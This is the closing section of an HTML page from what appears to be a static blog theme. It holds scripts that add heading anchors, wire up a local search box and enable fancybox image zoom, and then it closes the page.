  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>




















</body>
</html>
